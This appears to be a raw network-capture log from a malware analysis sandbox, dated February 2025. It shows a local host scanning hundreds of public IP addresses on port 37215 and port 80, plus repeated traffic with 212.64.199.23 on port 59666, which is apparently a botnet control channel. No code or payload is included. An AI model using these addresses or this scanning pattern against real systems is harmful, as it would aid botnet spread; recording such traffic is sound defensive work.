                                                          Feb 4, 2025 18:11:23.606250048 CET5041237215192.168.2.15156.203.209.254
                                                          Feb 4, 2025 18:11:23.606475115 CET5721437215192.168.2.15156.232.100.5
                                                          Feb 4, 2025 18:11:23.606478930 CET4259837215192.168.2.15156.11.120.114
                                                          Feb 4, 2025 18:11:23.606482029 CET4178037215192.168.2.1541.226.128.231
                                                          Feb 4, 2025 18:11:23.606482029 CET4701680192.168.2.15161.225.186.189
                                                          Feb 4, 2025 18:11:23.606486082 CET3989237215192.168.2.15156.168.128.103
                                                          Feb 4, 2025 18:11:23.606487989 CET4605237215192.168.2.15156.97.22.124
                                                          Feb 4, 2025 18:11:23.606496096 CET3380637215192.168.2.15197.250.173.206
                                                          Feb 4, 2025 18:11:23.606503963 CET5210437215192.168.2.15197.182.149.187
                                                          Feb 4, 2025 18:11:23.606508970 CET5553637215192.168.2.15156.82.174.2
                                                          Feb 4, 2025 18:11:23.606513023 CET4448037215192.168.2.1541.168.203.41
                                                          Feb 4, 2025 18:11:23.606522083 CET4468837215192.168.2.15197.73.150.163
                                                          Feb 4, 2025 18:11:23.606527090 CET4699437215192.168.2.15156.131.45.150
                                                          Feb 4, 2025 18:11:23.606529951 CET3548637215192.168.2.15156.6.3.31
                                                          Feb 4, 2025 18:11:23.606529951 CET5077237215192.168.2.1541.0.238.68
                                                          Feb 4, 2025 18:11:23.606532097 CET4415837215192.168.2.15197.14.226.63
                                                          Feb 4, 2025 18:11:23.606534958 CET5071037215192.168.2.15197.210.43.217
                                                          Feb 4, 2025 18:11:23.606537104 CET3608637215192.168.2.1541.89.164.219
                                                          Feb 4, 2025 18:11:23.606539965 CET5338837215192.168.2.15197.224.174.21
                                                          Feb 4, 2025 18:11:23.606544018 CET3519637215192.168.2.15156.118.79.234
                                                          Feb 4, 2025 18:11:23.606868029 CET4339037215192.168.2.15197.21.220.133
                                                          Feb 4, 2025 18:11:23.607403994 CET5375637215192.168.2.15197.57.30.186
                                                          Feb 4, 2025 18:11:23.607945919 CET4021237215192.168.2.15197.183.113.213
                                                          Feb 4, 2025 18:11:23.608479977 CET5115437215192.168.2.15156.54.76.237
                                                          Feb 4, 2025 18:11:23.609021902 CET5336837215192.168.2.15156.111.51.215
                                                          Feb 4, 2025 18:11:23.609549999 CET4182637215192.168.2.15156.223.115.217
                                                          Feb 4, 2025 18:11:23.610085964 CET4035037215192.168.2.15197.86.44.39
                                                          Feb 4, 2025 18:11:23.610625982 CET3614437215192.168.2.1541.243.175.234
                                                          Feb 4, 2025 18:11:23.611167908 CET6029037215192.168.2.1541.65.253.82
                                                          Feb 4, 2025 18:11:23.611707926 CET5245637215192.168.2.1541.85.95.107
                                                          Feb 4, 2025 18:11:23.612164021 CET3721553756197.57.30.186192.168.2.15
                                                          Feb 4, 2025 18:11:23.612205982 CET5375637215192.168.2.15197.57.30.186
                                                          Feb 4, 2025 18:11:23.612267971 CET3572437215192.168.2.15156.35.204.41
                                                          Feb 4, 2025 18:11:23.612828016 CET5463637215192.168.2.15197.127.188.92
                                                          Feb 4, 2025 18:11:23.613275051 CET5443037215192.168.2.15156.158.216.173
                                                          Feb 4, 2025 18:11:23.613275051 CET5443037215192.168.2.15156.158.216.173
                                                          Feb 4, 2025 18:11:23.613512039 CET5452637215192.168.2.15156.158.216.173
                                                          Feb 4, 2025 18:11:23.613825083 CET4199037215192.168.2.15197.79.247.50
                                                          Feb 4, 2025 18:11:23.613825083 CET4199037215192.168.2.15197.79.247.50
                                                          Feb 4, 2025 18:11:23.614070892 CET4205837215192.168.2.15197.79.247.50
                                                          Feb 4, 2025 18:11:23.614387989 CET5375637215192.168.2.15197.57.30.186
                                                          Feb 4, 2025 18:11:23.614387989 CET5375637215192.168.2.15197.57.30.186
                                                          Feb 4, 2025 18:11:23.614630938 CET5378237215192.168.2.15197.57.30.186
                                                          Feb 4, 2025 18:11:23.618060112 CET3721554430156.158.216.173192.168.2.15
                                                          Feb 4, 2025 18:11:23.618637085 CET3721541990197.79.247.50192.168.2.15
                                                          Feb 4, 2025 18:11:23.619158983 CET3721553756197.57.30.186192.168.2.15
                                                          Feb 4, 2025 18:11:23.624453068 CET3721540228197.152.15.124192.168.2.15
                                                          Feb 4, 2025 18:11:23.624460936 CET372154707841.114.117.190192.168.2.15
                                                          Feb 4, 2025 18:11:23.624469042 CET3721538708197.198.35.16192.168.2.15
                                                          Feb 4, 2025 18:11:23.628459930 CET3721547110197.44.208.174192.168.2.15
                                                          Feb 4, 2025 18:11:23.628468037 CET372156096041.164.28.9192.168.2.15
                                                          Feb 4, 2025 18:11:23.628474951 CET3721540230156.80.185.156192.168.2.15
                                                          Feb 4, 2025 18:11:23.628483057 CET3721541612156.193.79.196192.168.2.15
                                                          Feb 4, 2025 18:11:23.628498077 CET3721550026156.206.254.225192.168.2.15
                                                          Feb 4, 2025 18:11:23.628504992 CET372153529841.127.128.0192.168.2.15
                                                          Feb 4, 2025 18:11:23.634479046 CET5604437215192.168.2.15197.229.162.82
                                                          Feb 4, 2025 18:11:23.639246941 CET3721556044197.229.162.82192.168.2.15
                                                          Feb 4, 2025 18:11:23.639311075 CET5604437215192.168.2.15197.229.162.82
                                                          Feb 4, 2025 18:11:23.639369011 CET5604437215192.168.2.15197.229.162.82
                                                          Feb 4, 2025 18:11:23.644287109 CET3721556044197.229.162.82192.168.2.15
                                                          Feb 4, 2025 18:11:23.644323111 CET5604437215192.168.2.15197.229.162.82
                                                          Feb 4, 2025 18:11:23.660383940 CET3721541990197.79.247.50192.168.2.15
                                                          Feb 4, 2025 18:11:23.664441109 CET3721553756197.57.30.186192.168.2.15
                                                          Feb 4, 2025 18:11:23.664449930 CET3721554430156.158.216.173192.168.2.15
                                                          Feb 4, 2025 18:11:23.678930044 CET5966659600212.64.199.23192.168.2.15
                                                          Feb 4, 2025 18:11:23.678983927 CET5960059666192.168.2.15212.64.199.23
                                                          Feb 4, 2025 18:11:23.679023981 CET5960059666192.168.2.15212.64.199.23
                                                          Feb 4, 2025 18:11:23.691220045 CET5997259666192.168.2.15212.64.199.23
                                                          Feb 4, 2025 18:11:23.695998907 CET5966659972212.64.199.23192.168.2.15
                                                          Feb 4, 2025 18:11:23.696039915 CET5997259666192.168.2.15212.64.199.23
                                                          Feb 4, 2025 18:11:23.696679115 CET5997259666192.168.2.15212.64.199.23
                                                          Feb 4, 2025 18:11:23.701461077 CET5966659972212.64.199.23192.168.2.15
                                                          Feb 4, 2025 18:11:23.701502085 CET5997259666192.168.2.15212.64.199.23
                                                          Feb 4, 2025 18:11:23.706243038 CET5966659972212.64.199.23192.168.2.15
                                                          Feb 4, 2025 18:11:23.734479904 CET3884280192.168.2.15166.170.65.204
                                                          Feb 4, 2025 18:11:23.734503031 CET4189837215192.168.2.15156.158.79.191
                                                          Feb 4, 2025 18:11:23.734502077 CET5519237215192.168.2.15197.104.233.253
                                                          Feb 4, 2025 18:11:23.734503984 CET3373680192.168.2.15191.252.64.221
                                                          Feb 4, 2025 18:11:23.734503984 CET5865637215192.168.2.15156.64.0.128
                                                          Feb 4, 2025 18:11:23.734505892 CET3731637215192.168.2.15156.231.87.111
                                                          Feb 4, 2025 18:11:23.734519958 CET3368880192.168.2.1527.157.203.196
                                                          Feb 4, 2025 18:11:23.734524012 CET3438280192.168.2.15130.194.192.131
                                                          Feb 4, 2025 18:11:23.734524012 CET5198680192.168.2.1554.130.141.170
                                                          Feb 4, 2025 18:11:23.734525919 CET5360437215192.168.2.1541.98.58.143
                                                          Feb 4, 2025 18:11:23.734525919 CET4532237215192.168.2.1541.147.167.184
                                                          Feb 4, 2025 18:11:23.734525919 CET3527280192.168.2.1570.122.88.62
                                                          Feb 4, 2025 18:11:23.734534025 CET6001280192.168.2.1561.123.135.64
                                                          Feb 4, 2025 18:11:23.734534025 CET5260437215192.168.2.15156.47.87.157
                                                          Feb 4, 2025 18:11:23.734536886 CET4363280192.168.2.15176.116.3.194
                                                          Feb 4, 2025 18:11:23.734540939 CET5578237215192.168.2.15156.77.249.222
                                                          Feb 4, 2025 18:11:23.734540939 CET5045037215192.168.2.1541.68.14.153
                                                          Feb 4, 2025 18:11:23.734540939 CET4359880192.168.2.1550.40.250.2
                                                          Feb 4, 2025 18:11:23.734549999 CET4997437215192.168.2.1541.119.121.171
                                                          Feb 4, 2025 18:11:23.734550953 CET3903637215192.168.2.15156.130.121.177
                                                          Feb 4, 2025 18:11:23.734551907 CET5843037215192.168.2.1541.211.219.238
                                                          Feb 4, 2025 18:11:23.734556913 CET6069880192.168.2.151.19.246.235
                                                          Feb 4, 2025 18:11:23.734559059 CET4645280192.168.2.1524.76.98.2
                                                          Feb 4, 2025 18:11:23.734559059 CET5637880192.168.2.15193.158.34.34
                                                          Feb 4, 2025 18:11:23.734559059 CET4233280192.168.2.15197.171.131.230
                                                          Feb 4, 2025 18:11:23.734564066 CET5115437215192.168.2.15197.182.81.17
                                                          Feb 4, 2025 18:11:23.739361048 CET8038842166.170.65.204192.168.2.15
                                                          Feb 4, 2025 18:11:23.739371061 CET3721541898156.158.79.191192.168.2.15
                                                          Feb 4, 2025 18:11:23.739378929 CET8033736191.252.64.221192.168.2.15
                                                          Feb 4, 2025 18:11:23.739387035 CET3721558656156.64.0.128192.168.2.15
                                                          Feb 4, 2025 18:11:23.739393950 CET3721555192197.104.233.253192.168.2.15
                                                          Feb 4, 2025 18:11:23.739413023 CET3884280192.168.2.15166.170.65.204
                                                          Feb 4, 2025 18:11:23.739423037 CET4189837215192.168.2.15156.158.79.191
                                                          Feb 4, 2025 18:11:23.739427090 CET3373680192.168.2.15191.252.64.221
                                                          Feb 4, 2025 18:11:23.739427090 CET5865637215192.168.2.15156.64.0.128
                                                          Feb 4, 2025 18:11:23.739433050 CET5519237215192.168.2.15197.104.233.253
                                                          Feb 4, 2025 18:11:23.739464045 CET803368827.157.203.196192.168.2.15
                                                          Feb 4, 2025 18:11:23.739474058 CET8034382130.194.192.131192.168.2.15
                                                          Feb 4, 2025 18:11:23.739480972 CET3721537316156.231.87.111192.168.2.15
                                                          Feb 4, 2025 18:11:23.739489079 CET805198654.130.141.170192.168.2.15
                                                          Feb 4, 2025 18:11:23.739495993 CET3368880192.168.2.1527.157.203.196
                                                          Feb 4, 2025 18:11:23.739506960 CET3438280192.168.2.15130.194.192.131
                                                          Feb 4, 2025 18:11:23.739515066 CET5198680192.168.2.1554.130.141.170
                                                          Feb 4, 2025 18:11:23.739526033 CET3731637215192.168.2.15156.231.87.111
                                                          Feb 4, 2025 18:11:23.739532948 CET3373680192.168.2.15191.252.64.221
                                                          Feb 4, 2025 18:11:23.739554882 CET3884280192.168.2.15166.170.65.204
                                                          Feb 4, 2025 18:11:23.739588022 CET1064380192.168.2.1537.111.84.54
                                                          Feb 4, 2025 18:11:23.739598036 CET1064380192.168.2.15171.197.133.52
                                                          Feb 4, 2025 18:11:23.739602089 CET1064380192.168.2.159.69.141.54
                                                          Feb 4, 2025 18:11:23.739617109 CET1064380192.168.2.15187.95.133.253
                                                          Feb 4, 2025 18:11:23.739617109 CET1064380192.168.2.15138.165.25.173
                                                          Feb 4, 2025 18:11:23.739617109 CET1064380192.168.2.15107.48.165.38
                                                          Feb 4, 2025 18:11:23.739629984 CET1064380192.168.2.1578.19.9.148
                                                          Feb 4, 2025 18:11:23.739629984 CET1064380192.168.2.15187.165.33.142
                                                          Feb 4, 2025 18:11:23.739629984 CET1064380192.168.2.1540.53.138.82
                                                          Feb 4, 2025 18:11:23.739639044 CET1064380192.168.2.15126.131.162.108
                                                          Feb 4, 2025 18:11:23.739640951 CET1064380192.168.2.1539.186.95.126
                                                          Feb 4, 2025 18:11:23.739645004 CET1064380192.168.2.15218.106.53.221
                                                          Feb 4, 2025 18:11:23.739660978 CET1064380192.168.2.15193.192.145.27
                                                          Feb 4, 2025 18:11:23.739662886 CET1064380192.168.2.15143.29.206.190
                                                          Feb 4, 2025 18:11:23.739662886 CET1064380192.168.2.1551.89.235.102
                                                          Feb 4, 2025 18:11:23.739665031 CET1064380192.168.2.1531.184.101.85
                                                          Feb 4, 2025 18:11:23.739665985 CET1064380192.168.2.15131.217.212.171
                                                          Feb 4, 2025 18:11:23.739665985 CET1064380192.168.2.15169.63.36.197
                                                          Feb 4, 2025 18:11:23.739686966 CET1064380192.168.2.15176.106.48.170
                                                          Feb 4, 2025 18:11:23.739694118 CET1064380192.168.2.1577.144.35.181
                                                          Feb 4, 2025 18:11:23.739692926 CET1064380192.168.2.1565.129.195.33
                                                          Feb 4, 2025 18:11:23.739692926 CET1064380192.168.2.1554.226.46.254
                                                          Feb 4, 2025 18:11:23.739692926 CET1064380192.168.2.15133.145.127.5
                                                          Feb 4, 2025 18:11:23.739696980 CET1064380192.168.2.15114.237.90.82
                                                          Feb 4, 2025 18:11:23.739692926 CET1064380192.168.2.1560.182.210.60
                                                          Feb 4, 2025 18:11:23.739692926 CET1064380192.168.2.15124.127.9.190
                                                          Feb 4, 2025 18:11:23.739734888 CET1064380192.168.2.15123.188.248.123
                                                          Feb 4, 2025 18:11:23.739737034 CET1064380192.168.2.15137.42.49.83
                                                          Feb 4, 2025 18:11:23.739737988 CET1064380192.168.2.1525.14.201.115
                                                          Feb 4, 2025 18:11:23.739737988 CET1064380192.168.2.1579.163.139.95
                                                          Feb 4, 2025 18:11:23.739737988 CET1064380192.168.2.15114.107.37.23
                                                          Feb 4, 2025 18:11:23.739737988 CET1064380192.168.2.1562.53.36.74
                                                          Feb 4, 2025 18:11:23.739737988 CET1064380192.168.2.1523.253.230.7
                                                          Feb 4, 2025 18:11:23.739737988 CET1064380192.168.2.15119.192.18.251
                                                          Feb 4, 2025 18:11:23.739739895 CET1064380192.168.2.1527.231.33.82
                                                          Feb 4, 2025 18:11:23.739738941 CET1064380192.168.2.15159.226.165.163
                                                          Feb 4, 2025 18:11:23.739739895 CET1064380192.168.2.15139.41.54.97
                                                          Feb 4, 2025 18:11:23.739738941 CET1064380192.168.2.15197.255.243.62
                                                          Feb 4, 2025 18:11:23.739742994 CET1064380192.168.2.15141.238.227.244
                                                          Feb 4, 2025 18:11:23.739738941 CET1064380192.168.2.15125.254.100.246
                                                          Feb 4, 2025 18:11:23.739742994 CET1064380192.168.2.154.38.111.234
                                                          Feb 4, 2025 18:11:23.739742994 CET1064380192.168.2.15160.36.17.36
                                                          Feb 4, 2025 18:11:23.739742994 CET1064380192.168.2.1560.106.138.190
                                                          Feb 4, 2025 18:11:23.739742994 CET1064380192.168.2.15122.229.181.174
                                                          Feb 4, 2025 18:11:23.739784002 CET1064380192.168.2.1512.98.166.43
                                                          Feb 4, 2025 18:11:23.739784002 CET1064380192.168.2.1580.236.28.23
                                                          Feb 4, 2025 18:11:23.739784956 CET1064380192.168.2.1531.84.27.80
                                                          Feb 4, 2025 18:11:23.739785910 CET1064380192.168.2.15205.159.166.229
                                                          Feb 4, 2025 18:11:23.739784956 CET1064380192.168.2.1544.140.110.198
                                                          Feb 4, 2025 18:11:23.739785910 CET1064380192.168.2.15112.34.150.185
                                                          Feb 4, 2025 18:11:23.739784956 CET1064380192.168.2.1536.158.62.140
                                                          Feb 4, 2025 18:11:23.739785910 CET1064380192.168.2.15179.120.147.27
                                                          Feb 4, 2025 18:11:23.739784956 CET1064380192.168.2.15173.68.133.201
                                                          Feb 4, 2025 18:11:23.739785910 CET1064380192.168.2.1589.237.103.167
                                                          Feb 4, 2025 18:11:23.739789009 CET1064380192.168.2.15147.131.192.45
                                                          Feb 4, 2025 18:11:23.739789009 CET1064380192.168.2.15201.144.190.130
                                                          Feb 4, 2025 18:11:23.739789009 CET1064380192.168.2.1569.247.75.5
                                                          Feb 4, 2025 18:11:23.739789963 CET1064380192.168.2.15140.48.10.92
                                                          Feb 4, 2025 18:11:23.739792109 CET1064380192.168.2.15212.84.191.75
                                                          Feb 4, 2025 18:11:23.739792109 CET1064380192.168.2.1563.154.122.88
                                                          Feb 4, 2025 18:11:23.739792109 CET1064380192.168.2.15206.149.200.122
                                                          Feb 4, 2025 18:11:23.739792109 CET1064380192.168.2.1527.239.20.162
                                                          Feb 4, 2025 18:11:23.739792109 CET1064380192.168.2.15116.189.17.171
                                                          Feb 4, 2025 18:11:23.739792109 CET1064380192.168.2.15212.248.130.207
                                                          Feb 4, 2025 18:11:23.739836931 CET1064380192.168.2.15172.252.98.176
                                                          Feb 4, 2025 18:11:23.739836931 CET1064380192.168.2.1576.230.107.34
                                                          Feb 4, 2025 18:11:23.739836931 CET1064380192.168.2.15194.7.215.90
                                                          Feb 4, 2025 18:11:23.739840031 CET1064380192.168.2.1537.184.193.88
                                                          Feb 4, 2025 18:11:23.739840031 CET1064380192.168.2.15160.48.192.138
                                                          Feb 4, 2025 18:11:23.739840984 CET1064380192.168.2.1585.197.236.215
                                                          Feb 4, 2025 18:11:23.739840984 CET1064380192.168.2.15103.52.94.112
                                                          Feb 4, 2025 18:11:23.739840984 CET1064380192.168.2.15113.195.43.149
                                                          Feb 4, 2025 18:11:23.739840984 CET1064380192.168.2.15158.49.248.99
                                                          Feb 4, 2025 18:11:23.739842892 CET1064380192.168.2.15200.198.33.61
                                                          Feb 4, 2025 18:11:23.739840984 CET1064380192.168.2.15177.115.74.88
                                                          Feb 4, 2025 18:11:23.739842892 CET1064380192.168.2.158.138.152.36
                                                          Feb 4, 2025 18:11:23.739845037 CET1064380192.168.2.15114.35.162.251
                                                          Feb 4, 2025 18:11:23.739842892 CET1064380192.168.2.1565.142.61.40
                                                          Feb 4, 2025 18:11:23.739845037 CET1064380192.168.2.15208.88.109.124
                                                          Feb 4, 2025 18:11:23.739846945 CET1064380192.168.2.15211.77.195.154
                                                          Feb 4, 2025 18:11:23.739845037 CET1064380192.168.2.15163.86.134.193
                                                          Feb 4, 2025 18:11:23.739845037 CET1064380192.168.2.15111.202.164.208
                                                          Feb 4, 2025 18:11:23.739846945 CET1064380192.168.2.15118.108.74.167
                                                          Feb 4, 2025 18:11:23.739846945 CET1064380192.168.2.1574.241.189.89
                                                          Feb 4, 2025 18:11:23.739846945 CET1064380192.168.2.15152.196.208.168
                                                          Feb 4, 2025 18:11:23.739917994 CET1064380192.168.2.1524.218.123.109
                                                          Feb 4, 2025 18:11:23.739917994 CET1064380192.168.2.15141.248.5.7
                                                          Feb 4, 2025 18:11:23.739922047 CET1064380192.168.2.15199.136.227.5
                                                          Feb 4, 2025 18:11:23.739922047 CET1064380192.168.2.15149.57.181.240
                                                          Feb 4, 2025 18:11:23.739923000 CET1064380192.168.2.15170.220.103.127
                                                          Feb 4, 2025 18:11:23.739924908 CET1064380192.168.2.1563.194.11.166
                                                          Feb 4, 2025 18:11:23.739922047 CET1064380192.168.2.15144.122.252.109
                                                          Feb 4, 2025 18:11:23.739924908 CET1064380192.168.2.15133.169.73.51
                                                          Feb 4, 2025 18:11:23.739923954 CET1064380192.168.2.15162.240.184.207
                                                          Feb 4, 2025 18:11:23.739924908 CET1064380192.168.2.15161.190.221.15
                                                          Feb 4, 2025 18:11:23.739922047 CET1064380192.168.2.15182.236.143.79
                                                          Feb 4, 2025 18:11:23.739923954 CET1064380192.168.2.15162.195.253.138
                                                          Feb 4, 2025 18:11:23.739928961 CET1064380192.168.2.15141.46.191.213
                                                          Feb 4, 2025 18:11:23.739923000 CET1064380192.168.2.15203.81.33.74
                                                          Feb 4, 2025 18:11:23.739928961 CET1064380192.168.2.1542.27.36.247
                                                          Feb 4, 2025 18:11:23.739927053 CET1064380192.168.2.15161.3.31.157
                                                          Feb 4, 2025 18:11:23.739923000 CET1064380192.168.2.1580.173.142.127
                                                          Feb 4, 2025 18:11:23.739926100 CET1064380192.168.2.15162.142.39.232
                                                          Feb 4, 2025 18:11:23.739928961 CET1064380192.168.2.15157.30.123.218
                                                          Feb 4, 2025 18:11:23.739927053 CET1064380192.168.2.15157.128.54.122
                                                          Feb 4, 2025 18:11:23.739922047 CET1064380192.168.2.1564.193.176.0
                                                          Feb 4, 2025 18:11:23.739926100 CET1064380192.168.2.15141.13.130.66
                                                          Feb 4, 2025 18:11:23.739928961 CET1064380192.168.2.1588.227.149.217
                                                          Feb 4, 2025 18:11:23.739927053 CET1064380192.168.2.1597.242.41.92
                                                          Feb 4, 2025 18:11:23.739922047 CET1064380192.168.2.15204.149.101.94
                                                          Feb 4, 2025 18:11:23.739927053 CET1064380192.168.2.1593.96.154.82
                                                          Feb 4, 2025 18:11:23.740036964 CET1064380192.168.2.15223.150.66.250
                                                          Feb 4, 2025 18:11:23.740036964 CET1064380192.168.2.15179.32.47.143
                                                          Feb 4, 2025 18:11:23.740036964 CET1064380192.168.2.1581.6.57.196
                                                          Feb 4, 2025 18:11:23.740036964 CET1064380192.168.2.15123.180.219.175
                                                          Feb 4, 2025 18:11:23.740037918 CET1064380192.168.2.15185.49.126.207
                                                          Feb 4, 2025 18:11:23.740036964 CET1064380192.168.2.1588.174.252.252
                                                          Feb 4, 2025 18:11:23.740040064 CET1064380192.168.2.152.138.89.26
                                                          Feb 4, 2025 18:11:23.740040064 CET1064380192.168.2.1540.163.62.203
                                                          Feb 4, 2025 18:11:23.740037918 CET1064380192.168.2.15135.51.205.124
                                                          Feb 4, 2025 18:11:23.740037918 CET1064380192.168.2.1552.30.219.74
                                                          Feb 4, 2025 18:11:23.740037918 CET1064380192.168.2.15223.73.226.133
                                                          Feb 4, 2025 18:11:23.740045071 CET1064380192.168.2.15194.179.243.245
                                                          Feb 4, 2025 18:11:23.740042925 CET1064380192.168.2.15154.156.50.216
                                                          Feb 4, 2025 18:11:23.740045071 CET1064380192.168.2.15209.220.84.76
                                                          Feb 4, 2025 18:11:23.740037918 CET1064380192.168.2.1564.61.219.122
                                                          Feb 4, 2025 18:11:23.740046024 CET1064380192.168.2.15179.211.96.188
                                                          Feb 4, 2025 18:11:23.740045071 CET1064380192.168.2.15190.239.180.147
                                                          Feb 4, 2025 18:11:23.740037918 CET1064380192.168.2.15183.99.250.0
                                                          Feb 4, 2025 18:11:23.740046024 CET1064380192.168.2.15162.8.181.31
                                                          Feb 4, 2025 18:11:23.740040064 CET1064380192.168.2.15150.217.243.69
                                                          Feb 4, 2025 18:11:23.740037918 CET1064380192.168.2.15165.206.115.23
                                                          Feb 4, 2025 18:11:23.740045071 CET1064380192.168.2.15110.140.167.163
                                                          Feb 4, 2025 18:11:23.740040064 CET1064380192.168.2.15110.122.63.158
                                                          Feb 4, 2025 18:11:23.740042925 CET1064380192.168.2.1537.244.9.108
                                                          Feb 4, 2025 18:11:23.740037918 CET1064380192.168.2.1589.225.114.230
                                                          Feb 4, 2025 18:11:23.740045071 CET1064380192.168.2.1513.76.173.57
                                                          Feb 4, 2025 18:11:23.740046024 CET1064380192.168.2.1589.2.29.23
                                                          Feb 4, 2025 18:11:23.740045071 CET1064380192.168.2.15134.146.181.54
                                                          Feb 4, 2025 18:11:23.740040064 CET1064380192.168.2.15123.19.127.104
                                                          Feb 4, 2025 18:11:23.740046024 CET1064380192.168.2.15216.64.9.53
                                                          Feb 4, 2025 18:11:23.740042925 CET1064380192.168.2.1575.38.200.62
                                                          Feb 4, 2025 18:11:23.740040064 CET1064380192.168.2.15163.76.250.18
                                                          Feb 4, 2025 18:11:23.740037918 CET1064380192.168.2.15145.184.147.129
                                                          Feb 4, 2025 18:11:23.740040064 CET1064380192.168.2.15120.41.86.106
                                                          Feb 4, 2025 18:11:23.740046024 CET1064380192.168.2.15213.138.200.53
                                                          Feb 4, 2025 18:11:23.740045071 CET1064380192.168.2.15192.252.237.39
                                                          Feb 4, 2025 18:11:23.740058899 CET1064380192.168.2.15160.46.9.112
                                                          Feb 4, 2025 18:11:23.740045071 CET1064380192.168.2.15111.79.88.22
                                                          Feb 4, 2025 18:11:23.740046024 CET1064380192.168.2.1517.186.223.175
                                                          Feb 4, 2025 18:11:23.740042925 CET1064380192.168.2.15199.175.81.164
                                                          Feb 4, 2025 18:11:23.740040064 CET1064380192.168.2.15100.18.40.85
                                                          Feb 4, 2025 18:11:23.740058899 CET1064380192.168.2.15126.113.126.109
                                                          Feb 4, 2025 18:11:23.740042925 CET1064380192.168.2.1531.217.137.183
                                                          Feb 4, 2025 18:11:23.740045071 CET1064380192.168.2.1595.153.213.54
                                                          Feb 4, 2025 18:11:23.740042925 CET1064380192.168.2.15108.185.245.46
                                                          Feb 4, 2025 18:11:23.740045071 CET1064380192.168.2.15150.180.28.170
                                                          Feb 4, 2025 18:11:23.740040064 CET1064380192.168.2.15176.156.16.80
                                                          Feb 4, 2025 18:11:23.740046024 CET1064380192.168.2.15189.25.197.97
                                                          Feb 4, 2025 18:11:23.740045071 CET1064380192.168.2.15137.184.43.158
                                                          Feb 4, 2025 18:11:23.740042925 CET1064380192.168.2.1598.190.191.17
                                                          Feb 4, 2025 18:11:23.740042925 CET1064380192.168.2.1572.200.117.99
                                                          Feb 4, 2025 18:11:23.740040064 CET1064380192.168.2.1541.224.23.88
                                                          Feb 4, 2025 18:11:23.740046024 CET1064380192.168.2.159.232.61.182
                                                          Feb 4, 2025 18:11:23.740040064 CET1064380192.168.2.1563.227.247.150
                                                          Feb 4, 2025 18:11:23.740040064 CET1064380192.168.2.1585.15.95.101
                                                          Feb 4, 2025 18:11:23.740045071 CET1064380192.168.2.1590.43.10.17
                                                          Feb 4, 2025 18:11:23.740045071 CET1064380192.168.2.15213.213.5.239
                                                          Feb 4, 2025 18:11:23.740045071 CET1064380192.168.2.1584.107.253.167
                                                          Feb 4, 2025 18:11:23.740087986 CET1064380192.168.2.1523.242.47.21
                                                          Feb 4, 2025 18:11:23.740087986 CET1064380192.168.2.15195.138.229.210
                                                          Feb 4, 2025 18:11:23.740087986 CET1064380192.168.2.15111.143.209.126
                                                          Feb 4, 2025 18:11:23.740087986 CET1064380192.168.2.15123.87.135.166
                                                          Feb 4, 2025 18:11:23.740087986 CET1064380192.168.2.1545.65.226.181
                                                          Feb 4, 2025 18:11:23.740092039 CET1064380192.168.2.15199.150.96.133
                                                          Feb 4, 2025 18:11:23.740092039 CET1064380192.168.2.1599.112.20.53
                                                          Feb 4, 2025 18:11:23.740092039 CET1064380192.168.2.1591.88.33.200
                                                          Feb 4, 2025 18:11:23.740092039 CET1064380192.168.2.15161.254.128.171
                                                          Feb 4, 2025 18:11:23.740092039 CET1064380192.168.2.1519.5.207.59
                                                          Feb 4, 2025 18:11:23.740092039 CET1064380192.168.2.15103.8.224.90
                                                          Feb 4, 2025 18:11:23.740092039 CET1064380192.168.2.1545.77.170.213
                                                          Feb 4, 2025 18:11:23.740092039 CET1064380192.168.2.15177.28.45.111
                                                          Feb 4, 2025 18:11:23.740101099 CET1064380192.168.2.15197.195.122.227
                                                          Feb 4, 2025 18:11:23.740101099 CET1064380192.168.2.1575.239.209.211
                                                          Feb 4, 2025 18:11:23.740101099 CET1064380192.168.2.1535.136.135.24
                                                          Feb 4, 2025 18:11:23.740101099 CET1064380192.168.2.15154.210.182.101
                                                          Feb 4, 2025 18:11:23.740102053 CET1064380192.168.2.15219.251.32.84
                                                          Feb 4, 2025 18:11:23.740102053 CET1064380192.168.2.15103.96.48.182
                                                          Feb 4, 2025 18:11:23.740103006 CET1064380192.168.2.1523.185.150.110
                                                          Feb 4, 2025 18:11:23.740102053 CET1064380192.168.2.15152.3.137.72
                                                          Feb 4, 2025 18:11:23.740103960 CET1064380192.168.2.15115.45.167.112
                                                          Feb 4, 2025 18:11:23.740103006 CET1064380192.168.2.1573.7.121.230
                                                          Feb 4, 2025 18:11:23.740103960 CET1064380192.168.2.15173.89.71.60
                                                          Feb 4, 2025 18:11:23.740103006 CET1064380192.168.2.15107.177.128.18
                                                          Feb 4, 2025 18:11:23.740103960 CET1064380192.168.2.15203.171.93.158
                                                          Feb 4, 2025 18:11:23.740102053 CET1064380192.168.2.15199.240.76.161
                                                          Feb 4, 2025 18:11:23.740104914 CET1064380192.168.2.1558.157.175.15
                                                          Feb 4, 2025 18:11:23.740103960 CET1064380192.168.2.1572.157.3.99
                                                          Feb 4, 2025 18:11:23.740104914 CET1064380192.168.2.15158.1.51.138
                                                          Feb 4, 2025 18:11:23.740104914 CET1064380192.168.2.1551.172.38.126
                                                          Feb 4, 2025 18:11:23.740104914 CET1064380192.168.2.15206.49.176.199
                                                          Feb 4, 2025 18:11:23.740103006 CET1064380192.168.2.1574.181.112.42
                                                          Feb 4, 2025 18:11:23.740104914 CET1064380192.168.2.15109.221.104.109
                                                          Feb 4, 2025 18:11:23.740114927 CET1064380192.168.2.1552.251.239.233
                                                          Feb 4, 2025 18:11:23.740104914 CET1064380192.168.2.15183.228.137.113
                                                          Feb 4, 2025 18:11:23.740115881 CET1064380192.168.2.15223.39.18.213
                                                          Feb 4, 2025 18:11:23.740104914 CET1064380192.168.2.1594.127.40.113
                                                          Feb 4, 2025 18:11:23.740118027 CET1064380192.168.2.1540.151.180.105
                                                          Feb 4, 2025 18:11:23.740104914 CET1064380192.168.2.15143.191.211.178
                                                          Feb 4, 2025 18:11:23.740118027 CET1064380192.168.2.15152.82.134.112
                                                          Feb 4, 2025 18:11:23.740104914 CET1064380192.168.2.15103.168.83.85
                                                          Feb 4, 2025 18:11:23.740118980 CET1064380192.168.2.15146.190.254.237
                                                          Feb 4, 2025 18:11:23.740118027 CET1064380192.168.2.1524.248.217.96
                                                          Feb 4, 2025 18:11:23.740118980 CET1064380192.168.2.15110.48.202.142
                                                          Feb 4, 2025 18:11:23.740104914 CET1064380192.168.2.15133.88.237.11
                                                          Feb 4, 2025 18:11:23.740118980 CET1064380192.168.2.1558.117.135.165
                                                          Feb 4, 2025 18:11:23.740118980 CET1064380192.168.2.1584.67.231.249
                                                          Feb 4, 2025 18:11:23.740104914 CET1064380192.168.2.159.190.215.243
                                                          Feb 4, 2025 18:11:23.740118027 CET1064380192.168.2.15220.167.65.225
